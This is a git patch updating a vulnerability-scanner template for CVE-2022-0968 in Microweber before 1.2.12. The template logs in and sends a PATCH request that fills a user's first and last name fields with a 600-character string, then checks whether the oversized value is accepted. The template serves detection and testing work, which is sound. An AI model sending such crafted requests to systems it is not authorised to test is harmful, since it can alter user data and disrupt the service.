From 19bd005988d2da74e1da4daa8d1dde1540e1371c Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 29 Jul 2022 22:29:33 +0530
Subject: [PATCH] Update CVE-2022-0968.yaml

---
 cves/2022/CVE-2022-0968.yaml | 55 ++++++++++++------------------------
 1 file changed, 18 insertions(+), 37 deletions(-)

diff --git a/cves/2022/CVE-2022-0968.yaml b/cves/2022/CVE-2022-0968.yaml
index 52c3517988..410e92ab61 100644
--- a/cves/2022/CVE-2022-0968.yaml
+++ b/cves/2022/CVE-2022-0968.yaml
@@ -1,19 +1,23 @@
-id: CVE-2022-0963
+id: CVE-2022-0968
 
 info:
-  name: Integer Overflow in microweber prior to 1.2.12
+  name: Microweber < 1.2.12 - Integer Overflow (DOS)
   author: amit-jd
   severity: high
-  description: The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
+  description: |
+    The microweber application allows large characters to insert in the input field "first & last name" which can allow attackers to cause a Denial of Service (DoS) via a crafted HTTP request. The first name & last name input should be limited to 50 characters or max 100 characters.
   reference:
     - https://huntr.dev/bounties/97e36678-11cf-42c6-889c-892d415d9f9e/
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
     - https://github.com/advisories/GHSA-5fxv-xx5p-g2fv
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0968
   classification:
     cvss-metrics: CVSS:3.0/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
     cvss-score: 7.2
     cwe-id: CWE-190
-  tags: cve,cve2022,overflow,microweber,CMS
+  tags: cve,cve2022,overflow,microweber,cms
+
+variables:
+  input: '{{repeat("A", 600)}}'
 
 requests:
   - raw:
@@ -24,43 +28,28 @@ requests:
 
         username={{username}}&password={{password}}
 
-      - |
-        POST /csrf/ HTTP/1.1
-        Host: {{Hostname}}
-        X-Requested-With: XMLHttpRequest
-
       - |
         GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1
         Host: {{Hostname}}
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
-        Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}}
 
       - |
         POST /api/user/2 HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        X-XSRF-TOKEN: {{url_decode(csrf_token)}}
-        Cookie: laravel_session={{session}}; XSRF-TOKEN={{csrf_token}}
 
-        thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user_name}}&verify_password=&first_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&last_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
+        thumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user_name}}&verify_password=&first_name={{input}}&last_name={{input}}&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=
 
     req-condition: true
     cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_3,'\"first_name\":\"{{input}}\"')
+          - 'status_code_3==200'
+          - 'contains(all_headers_3,"application/json")'
+        condition: and
+
     extractors:
-      - type: json
-        part: body
-        name: csrf_token
-        json:
-          - .token
-        internal: true
-
-      - type: kval
-        part: header
-        name: session
-        kval:
-          - laravel_session
-        internal: true
-
       - type: regex
         part: body
         name: form_token
@@ -84,11 +73,3 @@ requests:
         group: 1
         regex:
           - '<input type="email" class="form-control" name="email" value="(.*)">'
-
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(body_4,"first_name":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")'
-          - 'status_code_4==200'
-          - 'contains(all_headers_4,"application/json")'
-        condition: and